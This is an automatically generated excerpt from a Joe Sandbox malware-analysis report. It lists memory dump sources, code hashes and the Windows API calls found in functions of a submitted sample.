                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                        • String ID:
                                                        • API String ID: 357397906-0
                                                        • Opcode ID: 0fffd6e3103c00fc83a180d3860de646b2de76d4f076a2345225becf2a1efebb
                                                        • Instruction ID: d9e92a762e14fae332a6a2da7b130326837b9292709cb13d164907e2686bd1b4
                                                        • Opcode Fuzzy Hash: 0fffd6e3103c00fc83a180d3860de646b2de76d4f076a2345225becf2a1efebb
                                                        • Instruction Fuzzy Hash: D3114679D00249EFDB41DF99C444AEEFBB9FB08310F104166E914E3220D735AA659F50
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?), ref: 003A6BE6
                                                          • Part of subcall function 003A76C4: _memset.LIBCMT ref: 003A76F9
                                                        • _memmove.LIBCMT ref: 003A6C09
                                                        • _memset.LIBCMT ref: 003A6C16
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 003A6C26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: 9eb564b14e7ec81ac456356c7806ebccc0876fcb37b24481639cec9c29c9498e
                                                        • Instruction ID: 2468fd1763c6fe3d8d5a9cf89ae81f2f72c1260c1775f5f88cda27510ac23444
                                                        • Opcode Fuzzy Hash: 9eb564b14e7ec81ac456356c7806ebccc0876fcb37b24481639cec9c29c9498e
                                                        • Instruction Fuzzy Hash: 45F0F47A100110ABCF066F55DC85E4ABB2AEF45361F04C065FE089E267D731E911DBB4
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00342231
                                                        • SetTextColor.GDI32(?,000000FF), ref: 0034223B
                                                        • SetBkMode.GDI32(?,00000001), ref: 00342250
                                                        • GetStockObject.GDI32(00000005), ref: 00342258
                                                        • GetWindowDC.USER32(?,00000000), ref: 0037BE83
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0037BE90
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0037BEA9
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0037BEC2
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0037BEE2
                                                        • ReleaseDC.USER32(?,00000000), ref: 0037BEED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 69524ebe985a81b0461679baeeba6f87802744e9b2479d769de7e1d3e50803f2
                                                        • Instruction ID: e3e6f1cf09b470e85f8fb5dd22fed22dcf96fcf787627b40479315a359eafeab
                                                        • Opcode Fuzzy Hash: 69524ebe985a81b0461679baeeba6f87802744e9b2479d769de7e1d3e50803f2
                                                        • Instruction Fuzzy Hash: 9AE06D32104244EEDF225F64FC0DBD87F26EB05332F14C366FA69980E187B29980DB12
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 0039871B
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,003982E6), ref: 00398722
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003982E6), ref: 0039872F
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,003982E6), ref: 00398736
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: 20f5c3db2adc456408fa669daa41e919a8edaf142259f63d146aa185f8e91818
                                                        • Instruction ID: 90dc4f520553e9e7d1c2e20817f8f09a67a0afa5ce069de1c8249dedbc2b25a2
                                                        • Opcode Fuzzy Hash: 20f5c3db2adc456408fa669daa41e919a8edaf142259f63d146aa185f8e91818
                                                        • Instruction Fuzzy Hash: 08E08676611221AFDB215FF09D0CF567BAEFF51B91F154828B685CA040DA349445C750
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %=
                                                        • API String ID: 0-1420429418
                                                        • Opcode ID: 9fbc1d10f42e1d6a5d32c49432f4ed191e5f3150847c1785656221e6833ad606
                                                        • Instruction ID: 7e99bea27c79d7d26a35b608d4c562a3c62ac9c9eae01a42b3eb1500c1b700c6
                                                        • Opcode Fuzzy Hash: 9fbc1d10f42e1d6a5d32c49432f4ed191e5f3150847c1785656221e6833ad606
                                                        • Instruction Fuzzy Hash: 35B19175D001099BCF16EF94C8869EEBBF9EF46310F114126E506AF2A1DB34BE85CB52
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: __itow_s
                                                        • String ID: xb@$xb@
                                                        • API String ID: 3653519197-193068574
                                                        • Opcode ID: 4fe1b1f06a3039f3463d7508ce16b98eed697e8bbcd00f8c11c23c31da238079
                                                        • Instruction ID: cf130a431081fa32d542cf100ce29665e81be60f3d9cfea41719a78a249951c1
                                                        • Opcode Fuzzy Hash: 4fe1b1f06a3039f3463d7508ce16b98eed697e8bbcd00f8c11c23c31da238079
                                                        • Instruction Fuzzy Hash: E6B17D70A00109EBCB15DF58C891EFABBF9EF59304F14805AFA459F692EB70E940CB60
                                                        APIs
                                                          • Part of subcall function 0035FC86: _wcscpy.LIBCMT ref: 0035FCA9
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        • __wcsnicmp.LIBCMT ref: 003AB02D
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003AB0F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: 2afaff1f0ae48d1ee439fd3c90745858346548b8c530161a5b4772d049d3ad13
                                                        • Instruction ID: 80320b3dd8d4134037c193e7ecb8cd7c6b763c53bb6b238b0ed0777fc4a1def7
                                                        • Opcode Fuzzy Hash: 2afaff1f0ae48d1ee439fd3c90745858346548b8c530161a5b4772d049d3ad13
                                                        • Instruction Fuzzy Hash: 0A617275A00215AFCB16DF98C891EAEF7F8EF09310F11406AF956AF252D770AE44CB50
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00352968
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00352981
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: f373ef26e97f6374550ca042b9cce745b4251c8db1a278ae499aa1b01774a060
                                                        • Instruction ID: c738f77436d9784bfa7bed5624420db3ce1830c5826191a85455ed0f702ec67d
                                                        • Opcode Fuzzy Hash: f373ef26e97f6374550ca042b9cce745b4251c8db1a278ae499aa1b01774a060
                                                        • Instruction Fuzzy Hash: 415156724087449BD321EF14D886BAFBBECFF85340F42885DF2D8491A1DB309568CB66
                                                        APIs
                                                          • Part of subcall function 00344F0B: __fread_nolock.LIBCMT ref: 00344F29
                                                        • _wcscmp.LIBCMT ref: 003A9824
                                                        • _wcscmp.LIBCMT ref: 003A9837
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: 681c06df677f1ca07e1a55f5521d20a932e8b5c3d74b93f04d96132b06f1db21
                                                        • Instruction ID: 7be5b47c8076aed76a3bfe2899b4ab892e811eafab20ac1fe8bf1a3bfa6fa4b2
                                                        • Opcode Fuzzy Hash: 681c06df677f1ca07e1a55f5521d20a932e8b5c3d74b93f04d96132b06f1db21
                                                        • Instruction Fuzzy Hash: BB41B671A00209BADF229AA1CC45FEFB7FDDF86710F01447AF904BF181DA75A9048B61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID: Dd@$Dd@
                                                        • API String ID: 1473721057-3375393111
                                                        • Opcode ID: 465c38df6d7f38610c92827cd3b99daa6c6aca72110f463a77fa5bce2f9e1947
                                                        • Instruction ID: 82a6e0fc1be4b1297cda5d46830dbfd0139722c9f7740bf13c73f67e6da5184a
                                                        • Opcode Fuzzy Hash: 465c38df6d7f38610c92827cd3b99daa6c6aca72110f463a77fa5bce2f9e1947
                                                        • Instruction Fuzzy Hash: 205110786087018FD796DF18C580A1ABBF1FB88344F56886DF9868B321E331E885CF42
                                                        APIs
                                                        • _memset.LIBCMT ref: 003B259E
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003B25D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |
                                                        • API String ID: 1413715105-2343686810
                                                        • Opcode ID: f7c36077387d65ea4cc9bcdd4501fea322f0d562f2d4a3308c8883e5a3ba6687
                                                        • Instruction ID: 8d61da684235376ecf14f7ad134197e3e980e90a28f8568efc54656d88a1ab5c
                                                        • Opcode Fuzzy Hash: f7c36077387d65ea4cc9bcdd4501fea322f0d562f2d4a3308c8883e5a3ba6687
                                                        • Instruction Fuzzy Hash: F8312871800119ABCF02EFA1CC85EEFBFB8FF08350F104159F954AA162EB316956DB60
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 003C7B61
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C7B76
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: c28987faab0994beae231b40b29dd8383d792b8b052982a09796542b128ed5de
                                                        • Instruction ID: df0b653b2632e66034f69cdacd122564b38b5547333f853cdd0b0fa448c25a6e
                                                        • Opcode Fuzzy Hash: c28987faab0994beae231b40b29dd8383d792b8b052982a09796542b128ed5de
                                                        • Instruction Fuzzy Hash: 9541D175A0520A9FDB15CF68C981BEABBB9FB08300F11416AED04EB391D771AD51CF90
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 003C6B17
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003C6B53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: d15c561571bdf025e246b11b5984ac9c5ab610552f216114f417587dde239f7d
                                                        • Instruction ID: 1bed7742868e5b2c53d68a0927d3d1aecccbf4a6b07b3eb1ef302fa0bd386d91
                                                        • Opcode Fuzzy Hash: d15c561571bdf025e246b11b5984ac9c5ab610552f216114f417587dde239f7d
                                                        • Instruction Fuzzy Hash: D4316D71200604AEDB129F69CC81FFB77A9FF48760F11862DF9A5D7190DA31AC91DB60
                                                        APIs
                                                        • _memset.LIBCMT ref: 003A2911
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003A294C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 02a1f5ddf2181d579f35c3b37a11c5db98ce519a830d288a74726d5ad95cae5e
                                                        • Instruction ID: 54fa2b38d5ad447a74ba631328609461c26903398d0540ee2c7ac1360d1f8cf7
                                                        • Opcode Fuzzy Hash: 02a1f5ddf2181d579f35c3b37a11c5db98ce519a830d288a74726d5ad95cae5e
                                                        • Instruction Fuzzy Hash: 2B31D2316003059FEB2ACF5CC985BAFBBB8EF46750F16402DED85A61A0D7709950CB51
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003C6761
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C676C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 457fb3212a4725a88872a53a5a3bd93e1380f241d6b7f954f4126e78f6966c4f
                                                        • Instruction ID: 506a88109be025acad1ebb49a788e79ec9f90e599ea782a86393b112e30047c8
                                                        • Opcode Fuzzy Hash: 457fb3212a4725a88872a53a5a3bd93e1380f241d6b7f954f4126e78f6966c4f
                                                        • Instruction Fuzzy Hash: B9118275200208AFEF129F54CC82FBB376EEB49368F114529F918DB290D671DC6197A0
                                                        APIs
                                                          • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                          • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                          • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 003C6C71
                                                        • GetSysColor.USER32(00000012), ref: 003C6C8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 6bbe52668395424420c18331e15e14fc05b355bcf13eabffad42b7b2e3f06c8c
                                                        • Instruction ID: 9d76210e46b663cd7337f99791dc1dcf9c2e5d41dc005d9cb0524b2db0899e72
                                                        • Opcode Fuzzy Hash: 6bbe52668395424420c18331e15e14fc05b355bcf13eabffad42b7b2e3f06c8c
                                                        • Instruction Fuzzy Hash: A1212672610209AFDF05DFA8CC46EFABBA9FB08314F014629F995E3250D735E861DB60
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 003C69A2
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003C69B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: 998db419e309890ac8c1923c170d30abe43541508cff26a811bb5e8f0b3aa9db
                                                        • Instruction ID: 68b76061a255337e7638ab014f982b304344d9eb4277ead5253e1476b428f434
                                                        • Opcode Fuzzy Hash: 998db419e309890ac8c1923c170d30abe43541508cff26a811bb5e8f0b3aa9db
                                                        • Instruction Fuzzy Hash: 1A116D71500108AFEB128E649C42FEB37AEEB06374F514728F9A5D71E0C731DC519B60
                                                        APIs
                                                        • _memset.LIBCMT ref: 003A2A22
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003A2A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 376f28375461beada461217a9c0b70498487ec6b5c2d0bad02dfbb455dbec53e
                                                        • Instruction ID: 82da25bc5107b24b945dc27eb6d68c4b95c9902ba54cb387b128e7ea94549b24
                                                        • Opcode Fuzzy Hash: 376f28375461beada461217a9c0b70498487ec6b5c2d0bad02dfbb455dbec53e
                                                        • Instruction Fuzzy Hash: 1111D032A05114AFCF32DB9CD844BAB73B8EB47300F064021E855E7290DB30AD0ACB91
                                                        APIs
